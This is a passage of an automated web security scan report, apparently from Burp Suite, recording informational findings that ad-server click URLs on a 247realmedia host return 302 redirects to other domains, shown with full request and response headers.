<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1966543230/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1966543230/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1966543230/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:43:11 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1972223152/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1972223152/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1972223152/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:47:44 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 300
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1988230146/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1988230146/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1988230146/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:51:26 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1989764170/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1989764170/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1989764170/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:05:48 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 390
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1990120906/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1990120906/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1990120906/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:41:25 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 390
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1992827791/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1992827791/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1992827791/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:41:23 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 390
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1993017733/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1993017733/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1993017733/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:55:51 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2000460958/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2000460958/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2000460958/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:22:10 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 300
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

20.331. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2003665576/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2003665576/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2003665576/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2003665576/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:56:38 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 316
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2011877321/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2011877321/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2011877321/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:00:02 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 328
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&i=2039">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2018916786/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2018916786/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2018916786/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:57:41 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 299
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2027917108/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2027917108/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2027917108/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:53:07 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 328
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&i=2039">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2028781671/Right1/Dom_Ent/House-Sound-Btn/bs_de_ad_300x100.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2028781671/Right1/Dom_Ent/House-Sound-Btn/bs_de_ad_300x100.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.myonlinepubs.com/publication?i=59161

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2028781671/Right1/Dom_Ent/House-Sound-Btn/bs_de_ad_300x100.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:50:18 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.myonlinepubs.com/publication?i=59161
Content-Length: 323
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.myonlinepubs.com/publication?i=59161">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2033280661/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2033280661/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2033280661/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:23:15 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2035051749/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2035051749/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2035051749/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:45:38 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
